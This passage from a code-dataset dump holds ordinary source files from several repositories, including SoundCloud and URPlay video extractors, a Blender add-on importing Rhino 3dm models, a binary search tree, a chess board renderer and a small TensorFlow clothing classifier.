'url': 'https://soundcloud.com/the-concept-band/sets/the-royal-concept-ep',
'info_dict': {
'id': '2284613',
'title': 'The Royal Concept EP',
'description': 'md5:71d07087c7a449e8941a70a29e34671e',
},
'playlist_mincount': 5,
}, {
'url': 'https://soundcloud.com/the-concept-band/sets/the-royal-concept-ep/token',
'only_matching': True,
}, {
'url': 'https://soundcloud.com/discover/sets/weekly::flacmatic',
'only_matching': True,
}, {
'url': 'https://soundcloud.com/discover/sets/charts-top:all-music:de',
'only_matching': True,
}, {
'url': 'https://soundcloud.com/discover/sets/charts-top:hiphoprap:kr',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
full_title = '%s/sets/%s' % mobj.group('uploader', 'slug_title')
token = mobj.group('token')
if token:
full_title += '/' + token
info = self._download_json(self._resolv_url(
self._BASE_URL + full_title), full_title, headers=self._HEADERS)
if 'errors' in info:
msgs = (compat_str(err['error_message']) for err in info['errors'])
raise ExtractorError('unable to download video webpage: %s' % ','.join(msgs))
return self._extract_set(info, token)
class SoundcloudPagedPlaylistBaseIE(SoundcloudIE):
def _extract_playlist(self, base_url, playlist_id, playlist_title):
# Per the SoundCloud documentation, the maximum limit for a linked partitioning query is 200.
# https://developers.soundcloud.com/blog/offset-pagination-deprecated
COMMON_QUERY = {
'limit': 200,
'linked_partitioning': '1',
}
query = COMMON_QUERY.copy()
query['offset'] = 0
next_href = base_url
entries = []
for i in itertools.count():
response = self._download_json(
next_href, playlist_id,
'Downloading track page %s' % (i + 1), query=query, headers=self._HEADERS)
collection = response['collection']
if not isinstance(collection, list):
collection = []
# Empty collection may be returned, in this case we proceed
# straight to next_href
def resolve_entry(candidates):
for cand in candidates:
if not isinstance(cand, dict):
continue
permalink_url = url_or_none(cand.get('permalink_url'))
if not permalink_url:
continue
return self.url_result(
permalink_url,
SoundcloudIE.ie_key() if SoundcloudIE.suitable(permalink_url) else None,
str_or_none(cand.get('id')), cand.get('title'))
for e in collection:
entry = resolve_entry((e, e.get('track'), e.get('playlist')))
if entry:
entries.append(entry)
next_href = response.get('next_href')
if not next_href:
break
parsed_next_href = compat_urlparse.urlparse(next_href)
query = compat_urlparse.parse_qs(parsed_next_href.query)
query.update(COMMON_QUERY)
return {
'_type': 'playlist',
'id': playlist_id,
'title': playlist_title,
'entries': entries,
}
class SoundcloudUserIE(SoundcloudPagedPlaylistBaseIE):
_VALID_URL = r'''(?x)
https?://
(?:(?:www|m)\.)?soundcloud\.com/
(?P<user>[^/]+)
(?:/
(?P<rsrc>tracks|albums|sets|reposts|likes|spotlight)
)?
/?(?:[?#].*)?$
'''
IE_NAME = 'soundcloud:user'
_TESTS = [{
'url': 'https://soundcloud.com/soft-cell-official',
'info_dict': {
'id': '207965082',
'title': 'Soft Cell (All)',
},
'playlist_mincount': 28,
}, {
'url': 'https://soundcloud.com/soft-cell-official/tracks',
'info_dict': {
'id': '207965082',
'title': 'Soft Cell (Tracks)',
},
'playlist_mincount': 27,
}, {
'url': 'https://soundcloud.com/soft-cell-official/albums',
'info_dict': {
'id': '207965082',
'title': 'Soft Cell (Albums)',
},
'playlist_mincount': 1,
}, {
'url': 'https://soundcloud.com/jcv246/sets',
'info_dict': {
'id': '12982173',
'title': 'Jordi / cv (Sets)',
},
'playlist_mincount': 2,
}, {
'url': 'https://soundcloud.com/jcv246/reposts',
'info_dict': {
'id': '12982173',
'title': 'Jordi / cv (Reposts)',
},
'playlist_mincount': 6,
}, {
'url': 'https://soundcloud.com/clalberg/likes',
'info_dict': {
'id': '11817582',
'title': 'clalberg (Likes)',
},
'playlist_mincount': 5,
}, {
'url': 'https://soundcloud.com/grynpyret/spotlight',
'info_dict': {
'id': '7098329',
'title': 'Grynpyret (Spotlight)',
},
'playlist_mincount': 1,
}]
_BASE_URL_MAP = {
'all': 'stream/users/%s',
'tracks': 'users/%s/tracks',
'albums': 'users/%s/albums',
'sets': 'users/%s/playlists',
'reposts': 'stream/users/%s/reposts',
'likes': 'users/%s/likes',
'spotlight': 'users/%s/spotlight',
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
uploader = mobj.group('user')
user = self._download_json(
self._resolv_url(self._BASE_URL + uploader),
uploader, 'Downloading user info', headers=self._HEADERS)
resource = mobj.group('rsrc') or 'all'
return self._extract_playlist(
self._API_V2_BASE + self._BASE_URL_MAP[resource] % user['id'],
str_or_none(user.get('id')),
'%s (%s)' % (user['username'], resource.capitalize()))
class SoundcloudTrackStationIE(SoundcloudPagedPlaylistBaseIE):
_VALID_URL = r'https?://(?:(?:www|m)\.)?soundcloud\.com/stations/track/[^/]+/(?P<id>[^/?#&]+)'
IE_NAME = 'soundcloud:trackstation'
_TESTS = [{
'url': 'https://soundcloud.com/stations/track/officialsundial/your-text',
'info_dict': {
'id': '286017854',
'title': 'Track station: your text',
},
'playlist_mincount': 47,
}]
def _real_extract(self, url):
track_name = self._match_id(url)
track = self._download_json(self._resolv_url(url), track_name, headers=self._HEADERS)
track_id = self._search_regex(
r'soundcloud:track-stations:(\d+)', track['id'], 'track id')
return self._extract_playlist(
self._API_V2_BASE + 'stations/%s/tracks' % track['id'],
track_id, 'Track station: %s' % track['title'])
class SoundcloudPlaylistIE(SoundcloudPlaylistBaseIE):
_VALID_URL = r'https?://api(?:-v2)?\.soundcloud\.com/playlists/(?P<id>[0-9]+)(?:/?\?secret_token=(?P<token>[^&]+?))?$'
IE_NAME = 'soundcloud:playlist'
_TESTS = [{
'url': 'https://api.soundcloud.com/playlists/4110309',
'info_dict': {
'id': '4110309',
'title': 'TILT Brass - Bowery Poetry Club, August \'03 [Non-Site SCR 02]',
'description': 're:.*?TILT Brass - Bowery Poetry Club',
},
'playlist_count': 6,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
playlist_id = mobj.group('id')
query = {}
token = mobj.group('token')
if token:
query['secret_token'] = token
data = self._download_json(
self._API_V2_BASE + 'playlists/' + playlist_id,
playlist_id, 'Downloading playlist', query=query, headers=self._HEADERS)
return self._extract_set(data, token)
class SoundcloudSearchIE(SearchInfoExtractor, SoundcloudIE):
IE_NAME = 'soundcloud:search'
IE_DESC = 'Soundcloud search'
_MAX_RESULTS = float('inf')
_TESTS = [{
'url': 'scsearch15:post-avant jazzcore',
'info_dict': {
'title': 'post-avant jazzcore',
},
'playlist_count': 15,
}]
_SEARCH_KEY = 'scsearch'
_MAX_RESULTS_PER_PAGE = 200
_DEFAULT_RESULTS_PER_PAGE = 50
def _get_collection(self, endpoint, collection_id, **query):
limit = min(
query.get('limit', self._DEFAULT_RESULTS_PER_PAGE),
self._MAX_RESULTS_PER_PAGE)
query.update({
'limit': limit,
'linked_partitioning': 1,
'offset': 0,
})
next_url = update_url_query(self._API_V2_BASE + endpoint, query)
collected_results = 0
for i in itertools.count(1):
response = self._download_json(
next_url, collection_id, 'Downloading page {0}'.format(i),
'Unable to download API page', headers=self._HEADERS)
collection = response.get('collection', [])
if not collection:
break
collection = list(filter(bool, collection))
collected_results += len(collection)
for item in collection:
yield self.url_result(item['uri'], SoundcloudIE.ie_key())
if not collection or collected_results >= limit:
break
next_url = response.get('next_href')
if not next_url:
break
def _get_n_results(self, query, n):
tracks = self._get_collection('search/tracks', query, limit=n, q=query)
return self.playlist_result(tracks, playlist_title=query)
```
#### File: youtube_dlc/extractor/urplay.py
```python
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import unified_timestamp
import re
class URPlayIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?ur(?:play|skola)\.se/(?:program|Produkter)/(?P<id>[0-9]+)'
_TESTS = [{
'url': 'https://urplay.se/program/203704-ur-samtiden-livet-universum-och-rymdens-markliga-musik-om-vetenskap-kritiskt-tankande-och-motstand',
'md5': 'ff5b0c89928f8083c74bbd5099c9292d',
'info_dict': {
'id': '203704',
'ext': 'mp4',
'title': 'Om vetenskap, kritiskt tänkande och motstånd',
'description': 'md5:5344508a52aa78c1ced6c1b8b9e44e9a',
'timestamp': 1513292400,
'upload_date': '20171214',
},
}, {
'url': 'https://urskola.se/Produkter/190031-Tripp-Trapp-Trad-Sovkudde',
'info_dict': {
'id': '190031',
'ext': 'mp4',
'title': 'Tripp, Trapp, Träd : Sovkudde',
'description': 'md5:b86bffdae04a7e9379d1d7e5947df1d1',
'timestamp': 1440093600,
'upload_date': '20150820',
},
}, {
'url': 'http://urskola.se/Produkter/155794-Smasagor-meankieli-Grodan-i-vida-varlden',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
urplayer_data = re.sub("&quot;", "\"", self._search_regex(
r'components\/Player\/Player\" data-react-props=\"({.+?})\"',
webpage, 'urplayer data'))
urplayer_data = self._parse_json(urplayer_data, video_id)
for i in range(len(urplayer_data['accessibleEpisodes'])):
if urplayer_data.get('accessibleEpisodes', {})[i].get('id') == int(video_id):
urplayer_data = urplayer_data['accessibleEpisodes'][i]
break
host = self._download_json('http://streaming-loadbalancer.ur.se/loadbalancer.json', video_id)['redirect']
formats = []
urplayer_streams = urplayer_data.get("streamingInfo")
for quality in ('sd', 'hd'):
location = (urplayer_streams.get("raw", {}).get(quality, {}).get("location")
or urplayer_streams.get("sweComplete", {}).get(quality, {}).get("location"))
if location:
formats.extend(self._extract_wowza_formats(
'http://%s/%s/playlist.m3u8' % (host, location), video_id,
skip_protocols=['f4m', 'rtmp', 'rtsp']))
self._sort_formats(formats)
subtitles = {}
subs = urplayer_streams.get("sweComplete", {}).get("tt", {}).get("location")
if subs:
subtitles.setdefault('Svenska', []).append({
'url': subs,
})
return {
'id': video_id,
'title': urplayer_data['title'],
'description': self._og_search_description(webpage),
'thumbnail': urplayer_data.get('image', {}).get('1280x720'),
'timestamp': unified_timestamp(self._html_search_meta(('uploadDate', 'schema:uploadDate'),
webpage, 'timestamp')),
'series': urplayer_data.get('seriesTitle'),
'subtitles': subtitles,
'formats': formats,
}
```
|
{
"source": "jesterKing/import_3dm",
"score": 2
}
|
#### File: import_3dm/converters/curve.py
```python
import rhino3dm as r3d
from . import utils
from mathutils import Vector
CONVERT = {}
def import_null(rcurve, bcurve, scale):
print("Failed to convert type", type(rcurve))
return None
def import_line(rcurve, bcurve, scale):
fr = rcurve.Line.From
to = rcurve.Line.To
line = bcurve.splines.new('POLY')
line.points.add(1)
line.points[0].co = (fr.X * scale, fr.Y * scale, fr.Z * scale, 1)
line.points[1].co = (to.X * scale, to.Y * scale, to.Z * scale, 1)
return line
CONVERT[r3d.LineCurve] = import_line
def import_polyline(rcurve, bcurve, scale):
N = rcurve.PointCount
polyline = bcurve.splines.new('POLY')
polyline.use_cyclic_u = rcurve.IsClosed
if rcurve.IsClosed:
N -= 1
polyline.points.add(N - 1)
for i in range(0, N):
rpt = rcurve.Point(i)
polyline.points[i].co = (rpt.X * scale, rpt.Y * scale, rpt.Z * scale, 1)
return polyline
CONVERT[r3d.PolylineCurve] = import_polyline
def import_nurbs_curve(rcurve, bcurve, scale):
N = len(rcurve.Points)
nurbs = bcurve.splines.new('NURBS')
nurbs.use_cyclic_u = rcurve.IsClosed
nurbs.points.add(N - 1)
for i in range(0, N):
rpt = rcurve.Points[i]
nurbs.points[i].co = (rpt.X * scale, rpt.Y * scale, rpt.Z * scale, rpt.W * scale)
#nurbs.use_bezier_u = True
nurbs.use_endpoint_u = True
nurbs.order_u = rcurve.Order
return nurbs
CONVERT[r3d.NurbsCurve] = import_nurbs_curve
def import_arc(rcurve, bcurve, scale):
spt = Vector((rcurve.Arc.StartPoint.X, rcurve.Arc.StartPoint.Y, rcurve.Arc.StartPoint.Z)) * scale
ept = Vector((rcurve.Arc.EndPoint.X, rcurve.Arc.EndPoint.Y, rcurve.Arc.EndPoint.Z)) * scale
cpt = Vector((rcurve.Arc.Center.X, rcurve.Arc.Center.Y, rcurve.Arc.Center.Z)) * scale
r1 = spt - cpt
r2 = ept - cpt
r1.normalize()
r2.normalize()
d = rcurve.Arc.Length * scale
normal = r1.cross(r2)
t1 = normal.cross(r1)
t2 = normal.cross(r2)
'''
Temporary arc
'''
arc = bcurve.splines.new('NURBS')
arc.use_cyclic_u = False
arc.points.add(3)
arc.points[0].co = (spt.x, spt.y, spt.z, 1)
sspt = spt + t1 * d * 0.33
arc.points[1].co = (sspt.x, sspt.y, sspt.z, 1)
eept = ept - t2 * d * 0.33
arc.points[2].co = (eept.x, eept.y, eept.z, 1)
arc.points[3].co = (ept.x, ept.y, ept.z, 1)
'''
print("ARC")
print(" StartPoint:", rcurve.Arc.StartPoint)
print(" EndPoint:", rcurve.Arc.EndPoint)
print(" Center:", rcurve.Arc.Center)
print(" Radius:", rcurve.Radius)
'''
arc.use_endpoint_u = True
arc.order_u = 3
return arc
CONVERT[r3d.ArcCurve] = import_arc
def import_polycurve(rcurve, bcurve, scale):
for seg in range(rcurve.SegmentCount):
segcurve = rcurve.SegmentCurve(seg)
if type(segcurve) in CONVERT.keys():
CONVERT[type(segcurve)](segcurve, bcurve, scale)
CONVERT[r3d.PolyCurve] = import_polycurve
def import_curve(context, ob, name, scale, options):
og = ob.Geometry
oa = ob.Attributes
curve_data = context.blend_data.curves.new(name, type="CURVE")
if type(og) in CONVERT.keys():
curve_data.dimensions = '3D'
curve_data.resolution_u = 2
CONVERT[type(og)](og, curve_data, scale)
return curve_data
```
#### File: import_3dm/converters/instances.py
```python
import bpy
import rhino3dm as r3d
from mathutils import Matrix
from mathutils import Vector
from math import sqrt
from . import utils
#TODO
#tag collections and references with guids
#test w/ more complex blocks and empty blocks
#proper exception handling
def handle_instance_definitions(context, model, toplayer, layername):
"""
import instance definitions from rhino model as empty collections
"""
if not layername in context.blend_data.collections:
instance_col = context.blend_data.collections.new(name=layername)
instance_col.hide_render = True
instance_col.hide_viewport = True
toplayer.children.link(instance_col)
for idef in model.InstanceDefinitions:
idef_col=utils.get_iddata(context.blend_data.collections,idef.Id, idef.Name, None )
try:
instance_col.children.link(idef_col)
except Exception:
pass
def import_instance_reference(context, ob, iref, name, scale, options):
#TODO: insert reduced mesh proxy and hide actual instance in viewport for better performance on large files
iref.empty_display_size=0.5
iref.empty_display_type='PLAIN_AXES'
iref.instance_type='COLLECTION'
iref.instance_collection = utils.get_iddata(context.blend_data.collections,ob.Geometry.ParentIdefId,"",None)
xform=list(ob.Geometry.Xform.ToFloatArray(1))
xform=[xform[0:4],xform[4:8], xform[8:12], xform[12:16]]
xform[0][3]*=scale
xform[1][3]*=scale
xform[2][3]*=scale
iref.matrix_world = Matrix(xform)
def populate_instance_definitions(context, model, toplayer, layername, options, scale):
import_as_grid = options.get("import_instances_grid_layout",False)
if import_as_grid:
count = 0
columns = int(sqrt(len(model.InstanceDefinitions)))
grid = options.get("import_instances_grid",False) *scale
#for every instance definition fish out the instance definition objects and link them to their parent
for idef in model.InstanceDefinitions:
parent=utils.get_iddata(context.blend_data.collections, idef.Id, idef.Name, None)
objectids=idef.GetObjectIds()
if import_as_grid:
#calculate position offset to lay out block definitions in xy plane
offset = Vector((count%columns * grid, (count-count%columns)/columns * grid, 0 ))
parent.instance_offset = offset #this sets the offset for the collection instances (read: resets the origin)
count +=1
for ob in context.blend_data.objects:
for uuid in objectids:
if ob.get('rhid',None) == str(uuid):
try:
parent.objects.link(ob)
if import_as_grid:
ob.location += offset #apply the previously calculated offset to all instance definition objects
except Exception:
pass
```
#### File: import_3dm/import_3dm/read3dm.py
```python
import os.path
import bpy
import sys
import os
import site
def modules_path():
# set up addons/modules under the user
# script path. Here we'll install the
# dependencies
modulespath = os.path.normpath(
os.path.join(
bpy.utils.script_path_user(),
"addons",
"modules"
)
)
if not os.path.exists(modulespath):
os.makedirs(modulespath)
# set user modules path at beginning of paths for earlier hit
if sys.path[1] != modulespath:
sys.path.insert(1, modulespath)
return modulespath
modules_path()
def install_dependencies():
modulespath = modules_path()
try:
from subprocess import run as sprun
try:
import pip
except:
print("Installing pip... "),
pyver = ""
if sys.platform != "win32":
pyver = "python{}.{}".format(
sys.version_info.major,
sys.version_info.minor
)
ensurepip = os.path.normpath(
os.path.join(
os.path.dirname(bpy.app.binary_path_python),
"..", "lib", pyver, "ensurepip"
)
)
# install pip using the user scheme using the Python
# version bundled with Blender
res = sprun([bpy.app.binary_path_python, ensurepip, "--user"])
if res.returncode == 0:
import pip
else:
raise Exception("Failed to install pip.")
print("Installing rhino3dm to {}... ".format(modulespath)),
# if we eventually want to pin a certain version
# we can add here something like "==0.0.5".
# for now assume latest available is ok
rhino3dm_version=""
pip3 = "pip3"
if sys.platform=="darwin":
pip3 = os.path.normpath(
os.path.join(
os.path.dirname(bpy.app.binary_path_python),
"..",
"bin",
pip3
)
)
# call pip in a subprocess so we don't have to mess
# with internals. Also, this ensures the Python used to
# install pip is going to be used
res = sprun([pip3, "install", "--upgrade", "--target", modulespath, "rhino3dm{}".format(rhino3dm_version)])
if res.returncode!=0:
print("Please try manually installing rhino3dm with: pip3 install --upgrade --target {} rhino3dm".format(modulespath))
raise Exception("Failed to install rhino3dm. See console for manual install instruction.")
except:
raise Exception("Failed to install dependencies. Please make sure you have pip installed.")
# TODO: add update mechanism
try:
import rhino3dm as r3d
except:
print("Failed to load rhino3dm, trying to install automatically...")
try:
install_dependencies()
# let user restart Blender, reloading of rhino3dm after automated
# install doesn't always work, better to just fail clearly before
# that
raise Exception("Please restart Blender.")
except:
raise
from . import converters
def read_3dm(context, options):
filepath = options.get("filepath", "")
model = None
try:
model = r3d.File3dm.Read(filepath)
except:
print("Failed to import .3dm model: {}".format(filepath))
return {'CANCELLED'}
top_collection_name = os.path.splitext(os.path.basename(filepath))[0]
if top_collection_name in context.blend_data.collections.keys():
toplayer = context.blend_data.collections[top_collection_name]
else:
toplayer = context.blend_data.collections.new(name=top_collection_name)
# Get proper scale for conversion
scale = r3d.UnitSystem.UnitScale(model.Settings.ModelUnitSystem, r3d.UnitSystem.Meters) / context.scene.unit_settings.scale_length
layerids = {}
materials = {}
# Parse options
import_views = options.get("import_views", False)
import_named_views = options.get("import_named_views", False)
import_hidden_objects = options.get("import_hidden_objects", False)
import_hidden_layers = options.get("import_hidden_layers", False)
import_groups = options.get("import_groups", False)
import_nested_groups = options.get("import_nested_groups", False)
import_instances = options.get("import_instances",False)
update_materials = options.get("update_materials", False)
# Import Views and NamedViews
if import_views:
converters.handle_views(context, model, toplayer, model.Views, "Views", scale)
if import_named_views:
converters.handle_views(context, model, toplayer, model.NamedViews, "NamedViews", scale)
# Handle materials
converters.handle_materials(context, model, materials, update_materials)
# Handle layers
converters.handle_layers(context, model, toplayer, layerids, materials, update_materials, import_hidden_layers)
materials[converters.DEFAULT_RHINO_MATERIAL] = None
#build skeletal hierarchy of instance definitions as collections (will be populated by object importer)
if import_instances:
converters.handle_instance_definitions(context, model, toplayer, "Instance Definitions")
# Handle objects
for ob in model.Objects:
og = ob.Geometry
# Skip unsupported object types early
if og.ObjectType not in converters.RHINO_TYPE_TO_IMPORT and og.ObjectType != r3d.ObjectType.InstanceReference:
print("Unsupported object type: {}".format(og.ObjectType))
continue
#convert_rhino_object = converters.RHINO_TYPE_TO_IMPORT[og.ObjectType]
# Check object and layer visibility
attr = ob.Attributes
if not attr.Visible and not import_hidden_objects:
continue
rhinolayer = model.Layers.FindIndex(attr.LayerIndex)
if not rhinolayer.Visible and not import_hidden_layers:
continue
# Create object name
if attr.Name == "" or attr.Name is None:
n = str(og.ObjectType).split(".")[1]+" " + str(attr.Id)
else:
n = attr.Name
# Get render material
mat_index = ob.Attributes.MaterialIndex
if ob.Attributes.MaterialSource == r3d.ObjectMaterialSource.MaterialFromLayer:
mat_index = rhinolayer.RenderMaterialIndex
rhino_material = model.Materials.FindIndex(mat_index)
# Handle default material and fetch associated Blender material
if rhino_material.Name == "":
matname = converters.material.DEFAULT_RHINO_MATERIAL
else:
matname = converters.material_name(rhino_material)
# Handle object view color
if ob.Attributes.ColorSource == r3d.ObjectColorSource.ColorFromLayer:
view_color = rhinolayer.Color
else:
view_color = ob.Attributes.ObjectColor
rhinomat = materials[matname]
# Fetch layer
layer = layerids[str(rhinolayer.Id)][1]
if og.ObjectType==r3d.ObjectType.InstanceReference and import_instances:
n = model.InstanceDefinitions.FindId(og.ParentIdefId).Name
# Convert object
converters.convert_object(context, ob, n, layer, rhinomat, view_color, scale, options)
#convert_rhino_object(og, context, n, attr.Name, attr.Id, layer, rhinomat, scale)
if import_groups:
converters.handle_groups(context,attr,toplayer,import_nested_groups)
if import_instances:
converters.populate_instance_definitions(context, model, toplayer, "Instance Definitions", options, scale)
# finally link in the container collection (top layer) into the main
# scene collection.
try:
context.blend_data.scenes[0].collection.children.link(toplayer)
bpy.ops.object.shade_smooth({'selected_editable_objects': toplayer.all_objects})
except Exception:
pass
return {'FINISHED'}
```
|
{
"source": "jesterKing/rhipy",
"score": 2
}
|
#### File: jesterKing/rhipy/change_texture_filepath.py
```python
import os
import rhinoscriptsyntax
import scriptcontext
import Rhino.Render
import System.Convert
def handle_render_content(render_content, target):
child = render_content.FirstChild
while child:
handle_render_content(child, target)
if child.IsImageBased():
child.BeginChange(Rhino.Render.RenderContent.ChangeContexts.Program)
source_path = System.Convert.ToString(child.GetParameter("filename"))
source_file = os.path.basename(source_path)
child.SetParameter("filename", target + os.sep + source_file)
child.EndChange()
child = child.NextSibling
target = rhinoscriptsyntax.BrowseForFolder()
for render_material in scriptcontext.doc.RenderMaterials:
handle_render_content(render_material, target)
```
|
{
"source": "JesterOrNot/Algorithms",
"score": 4
}
|
#### File: Algorithms/BST/BST.py
```python
class Node:
def __init__(self, value):
self.left = None
self.right = None
self.value = value
class BinaryTree(object):
def __init__(self):
super(BinaryTree,self).__init__()
self.root = None
def printInOrder(root):
if not root:
return
printInOrder(root.left)
print(root.value,end=", ")
printInOrder(root.right)
def printPreOrder(root):
if not root:
return
print(root.value,end=", ")
printPreOrder(root.left)
printPreOrder(root.right)
def printPostOrder(root):
if not root:
return
printPostOrder(root.left)
printPostOrder(root.right)
print(root.value,end=", ")
def findNode(target,tree,current):
if target == current.value:
return True
elif target < current.value:
if current.left is not None:
current = current.left
else:
return False
elif target >= current.value:
if current.right is not None:
current = current.right
else:
return False
return findNode(target,tree,current)
def insertNode(node,root):
if root == None:
return node
elif node.value < root.value:
root.left = insertNode(node,root.left)
else:
root.right = insertNode(node,root.right)
return root
def assembleTree(theList):
tree = BinaryTree()
tree.root = Node(theList[0])
index = 1
while index <= len(theList)-1:
insertNode(Node(theList[index]),tree.root)
index+=1
return(tree)
tree = assembleTree([5,2,1,0,3.10,3.5,-3])
printInOrder(tree.root)
print()
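# --- Hedged usage sketch (not part of the original file) ---
# Demonstrates the remaining traversals and the membership test on the same
# tree; the lookup values below are illustrative.
printPreOrder(tree.root)
print()
printPostOrder(tree.root)
print()
print(findNode(3.5, tree, tree.root))  # True: 3.5 was inserted above
print(findNode(42, tree, tree.root))   # False: 42 is not in the tree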
```
|
{
"source": "JesterOrNot/Chess",
"score": 3
}
|
#### File: Chess/src/chessBoard.py
```python
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from matplotlib.offsetbox import OffsetImage, AnnotationBbox
import __init__ # imports all the piece classes
pieces = __init__.Pieces() # instantiates the Pieces class locally as 'pieces'
# This function plots the image data for the sprites
def board():
def getImage(path):
return OffsetImage(plt.imread(path))
# This gets each sprite's image path and puts them in a list
paths = [pieces.WhitePawn1.paths, pieces.WhitePawn2.paths, pieces.WhitePawn3.paths, pieces.WhitePawn4.paths, pieces.WhitePawn5.paths, pieces.WhitePawn6.paths,
pieces.WhitePawn7.paths, pieces.WhitePawn8.paths, pieces.WhiteBishop1.paths, pieces.WhiteBishop2.paths, pieces.BlackBishop1.paths, pieces.BlackBishop2.paths,
pieces.WhiteRook1.paths,
pieces.WhiteRook2.paths,
pieces.WhiteKnight1.paths,
pieces.WhiteKnight2.paths,
pieces.WhiteQueen.paths,
pieces.WhiteKing.paths,
pieces.BlackPawn1.paths,
pieces.BlackPawn2.paths,
pieces.BlackPawn3.paths,
pieces.BlackPawn4.paths,
pieces.BlackPawn5.paths,
pieces.BlackPawn6.paths,
pieces.BlackPawn7.paths,
pieces.BlackPawn8.paths,
pieces.BlackRook1.paths,
pieces.BlackRook2.paths,
pieces.BlackKnight1.paths,
pieces.BlackKnight2.paths,
pieces.BlackQueen.paths,
pieces.BlackKing.paths]
# This gets each sprite's x position
x = [pieces.WhitePawn1.Position.get("x"), pieces.WhitePawn2.Position.get("x"), pieces.WhitePawn3.Position.get("x"), pieces.WhitePawn4.Position.get("x"), pieces.WhitePawn5.Position.get("x"), pieces.WhitePawn6.Position.get(
"x"), pieces.WhitePawn7.Position.get("x"), pieces.WhitePawn8.Position.get("x"), pieces.WhiteBishop1.Position.get("x"), pieces.WhiteBishop2.Position.get("x"), pieces.BlackBishop1.Position.get("x"), pieces.BlackBishop2.Position.get("x"),
pieces.WhiteRook1.Position.get("x"),
pieces.WhiteRook2.Position.get("x"),
pieces.WhiteKnight1.Position.get("x"),
pieces.WhiteKnight2.Position.get("x"),
pieces.WhiteQueen.Position.get("x"),
pieces.WhiteKing.Position.get("x"),
pieces.BlackPawn1.Position.get("x"),
pieces.BlackPawn2.Position.get("x"),
pieces.BlackPawn3.Position.get("x"),
pieces.BlackPawn4.Position.get("x"),
pieces.BlackPawn5.Position.get("x"),
pieces.BlackPawn6.Position.get("x"),
pieces.BlackPawn7.Position.get("x"),
pieces.BlackPawn8.Position.get("x"),
pieces.BlackRook1.Position.get("x"),
pieces.BlackRook2.Position.get("x"),
pieces.BlackKnight1.Position.get("x"),
pieces.BlackKnight2.Position.get("x"),
pieces.BlackQueen.Position.get("x"),
pieces.BlackKing.Position.get("x")]
# This gets each piece's y position
y = [pieces.WhitePawn1.Position.get("y"), pieces.WhitePawn2.Position.get(
"y"), pieces.WhitePawn3.Position.get("y"), pieces.WhitePawn4.Position.get("y"), pieces.WhitePawn5.Position.get("y"), pieces.WhitePawn6.Position.get("y"), pieces.WhitePawn7.Position.get("y"), pieces.WhitePawn8.Position.get("y"), pieces.WhiteBishop1.Position.get("y"), pieces.WhiteBishop2.Position.get("y"), pieces.BlackBishop1.Position.get("y"), pieces.BlackBishop2.Position.get("y"),
pieces.WhiteRook1.Position.get("y"),
pieces.WhiteRook2.Position.get("y"),
pieces.WhiteKnight1.Position.get("y"),
pieces.WhiteKnight2.Position.get("y"),
pieces.WhiteQueen.Position.get('y'),
pieces.WhiteKing.Position.get("y"),
pieces.BlackPawn1.Position.get("y"),
pieces.BlackPawn2.Position.get("y"),
pieces.BlackPawn3.Position.get("y"),
pieces.BlackPawn4.Position.get("y"),
pieces.BlackPawn5.Position.get("y"),
pieces.BlackPawn6.Position.get("y"),
pieces.BlackPawn7.Position.get("y"),
pieces.BlackPawn8.Position.get("y"),
pieces.BlackRook1.Position.get("y"),
pieces.BlackRook2.Position.get("y"),
pieces.BlackKnight1.Position.get("y"),
pieces.BlackKnight2.Position.get("y"),
pieces.BlackQueen.Position.get("y"),
pieces.BlackKing.Position.get("y")]
fig, ax = plt.subplots() # creates the figure and axes (for aesthetics and to keep a handle on the subplot)
# This draws the pieces as a scatter plot
ax.scatter(x, y)
### Development aid: these tick marks help visualize each square on the board
plt.xticks([100,240,380,520,650,780,910,1040,1180])
plt.yticks([100,240,370,500,630,760,890,1020,1150])
plt.xticks([]) ## Hides the tick marks for deployment (overrides the development ticks above)
plt.yticks([]) ## Hides the tick marks for deployment
# plt.grid(which='both',axis='both') # Uncomment during development; it shows the grid on the plot
img = mpimg.imread('Sprites/chessBoard.png') ## Loads the background image, in this case the chess board
imgplot = plt.imshow(img) ## shows the board
for x0, y0, path in zip(x, y, paths): ## Loops through the lists and uses zip to pair each piece's image path with its respective x & y coordinate
ab = AnnotationBbox(getImage(path), (x0, y0), frameon=False) ## reads the sprite image
ax.add_artist(ab) ### Draws the sprite onto the axes
plt.savefig("theBoard/chessBoard.png") ### Saves the rendered board to disk
board()
```
|
{
"source": "JesterOrNot/ClothingID",
"score": 3
}
|
#### File: JesterOrNot/ClothingID/model.py
```python
import tensorflow as tf
def ClothingID(training_images, training_labels, test_images, test_labels):
"""Machine learning function."""
model = tf.keras.models.Sequential([
tf.keras.layers.Conv2D(64, (3, 3), activation='relu', input_shape=(28, 28, 1)),
tf.keras.layers.MaxPooling2D(2, 2),
tf.keras.layers.Conv2D(64, (3, 3), activation='relu'),
tf.keras.layers.MaxPooling2D(2, 2),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(128, activation=tf.nn.relu),
tf.keras.layers.Dense(10, activation=tf.nn.softmax)
])
model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
model.fit(training_images, training_labels, epochs=5)
predictions = model.predict(test_images)
model.save('path_to_saved_model', save_format='tf')
return predictions
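# --- Hedged usage sketch (not part of the original file) ---
# Loads the Fashion-MNIST dataset bundled with Keras, reshapes and normalizes
# it to the (28, 28, 1) float input the Conv2D stack expects, and runs
# ClothingID. The dataset choice is an assumption based on the 10-class output.
if __name__ == '__main__':
    (train_x, train_y), (test_x, test_y) = tf.keras.datasets.fashion_mnist.load_data()
    train_x = train_x.reshape(-1, 28, 28, 1) / 255.0
    test_x = test_x.reshape(-1, 28, 28, 1) / 255.0
    preds = ClothingID(train_x, train_y, test_x, test_y)
    print('first test prediction:', preds[0].argmax())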
```
|
{
"source": "JesterOrNot/MathLang",
"score": 3
}
|
#### File: MathLang/repl/repl.py
```python
import sys
import tty
import re
import os
def syntax_highlight(input, keywords: dict):
i = 0
splitted = input.split(" ")
for f in splitted:
for keyword in keywords.keys():
if re.match(keyword, f):
splitted[i] = keywords.get(
keyword) + re.findall(keyword, f)[0] + u"\u001b[0m"
i += 1
return " ".join(splitted)
def command_line(keywords: dict):
